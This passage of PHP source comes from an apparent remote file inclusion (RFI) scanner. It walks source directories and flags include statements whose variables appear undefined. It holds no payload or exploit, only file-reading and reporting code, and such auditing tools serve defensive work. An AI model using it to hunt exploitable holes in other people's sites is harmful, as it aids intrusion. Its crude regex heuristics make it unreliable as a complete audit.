        if( $bytes < 1048576    ) return ($bytes / 1024) . " Kb";
        if( $bytes < 1073741824 ) return ($bytes / 1048576) . " Mb";
 
        return ($bytes / 1073741824) . " Gb";
    }
 
    /* Returns the timestamp in seconds */
    function escan_get_mtime()
    {
        list($usec, $sec) = explode(" ",microtime());
        return ((float)$usec + (float)$sec);
    }
 
    /* Extracts line of code inclusion */
    function escan_scan_line($content,$offset)
    {
        list( $line, $dummy ) = explode( ";" , substr($content,$offset,strlen($content)) );
 
        return $line.";";
    }
 
    /* Extract the variable name from line of code inclusion */
    function escan_parse_var( $line, $regex_id )
    {
        global $escan_var_regex;
 
        $vars       = preg_split($escan_var_regex[$regex_id],$line);
        $varname    = $vars[1];
        $delimiters = " .);";
 
        for( $i = 0; $i < strlen($varname); $i++ ){
            for( $j = 0; $j < strlen($delimiters); $j++ ){
                if($varname[$i] == $delimiters[$j]){
                    return substr( $varname, 0, $i );
                }
            }
        }
 
        return $varname;
    }
 
    /* Check if the variable $var is defined in $content before position $offset*/
    function escan_check_definitions($content,$offset,$var)
    {
        if( strpos( $var, "->" ) ){
            return 1;
        }
 
        $chunk = substr($content,0,$offset);
        $regex = "/".preg_quote($var,"/")."\s*=/ix";
        preg_match( $regex, $chunk,$matches );
 
        return count($matches);
    }
 
    /* $file the file to check for potential rfi */
    function escan_parse_file($file)
    {
        global $escan_inc_regex;
        global $escan_max_size;
        global $escan_file_count;
        global $escan_match_count;
        global $escan_byte_count;
 
        $fsize = filesize($file);
 
        if( $escan_max_size && $fsize > $escan_max_size ) return;
 
        $escan_file_count++;
        $escan_byte_count += $fsize;
 
        $content = @file_get_contents($file);
 
        for( $i = 0; $i < count($escan_inc_regex); $i++ ){
            if( preg_match_all( $escan_inc_regex[$i], $content, $matches, PREG_OFFSET_CAPTURE ) ){
 
                $nmatch = count($matches[0]);
 
                for( $j = 0; $j < $nmatch; $j++ ){
                    $offset = $matches[0][$j][1];
                    $line   = escan_scan_line($content,$offset);
                    $var    = escan_parse_var($line,$i);
 
                    if( escan_check_definitions($content,$offset,$var) == 0 )
                    {
                        $escan_match_count++;
                        print "@ $file - \n\t- '$var' The position $offset .\n";
                    }
                }
            }
        }
    }
 
    /* Returns the file extension $fname */
    function escan_get_file_ext($fname)
    {
        if( strchr($fname,'.') ){
            return substr($fname,strrpos($fname,'.')+1);
        }
        else{
            return "";
        }
    }
 
    /* Check if file $fname is a valid extension */
    function escan_isvalid_ext($fname)
    {
        global $escan_valid_ext;
 
        for( $i = 0; $i < count($escan_valid_ext); $i++ ){
            if(strstr(escan_get_file_ext($fname),$escan_valid_ext[$i])){
                return true;
            }
        }
 
        return false;
    }
 
    /* That function scans directories recursively */
    function escan_recurse_dir($dir)
    {
        global $escan_dir_count;
 
        $escan_dir_count++;
 
        if( $cdir = @dir($dir) ){
            while( $entry = $cdir->read() ){
                if( $entry != '.' && $entry != '..' ){
                    if( is_dir($dir.$entry) ){
                        escan_recurse_dir($dir.$entry.DIRECTORY_SEPARATOR);
                    }
                    else{
                        if( escan_isvalid_ext($dir.$entry) ){
                            escan_parse_file($dir.$entry);
                        }
                    }
                }
            }
 
            $cdir->close();
        }
    }
 
    function escan_banner()
    {
        print "*-----------------------------------------------------*\n" .
              "*   PHP Security-Shell RFI Scanner v1.0  by pentest   *\n" .
              "*                                                     *\n" .
              "*             http://security-sh3ll.com               *\n" .
              "*-----------------------------------------------------*\n\n";
    }
 
    function escan_usage($pname)
    {
        print "Use : php $pname \n";
    }
?>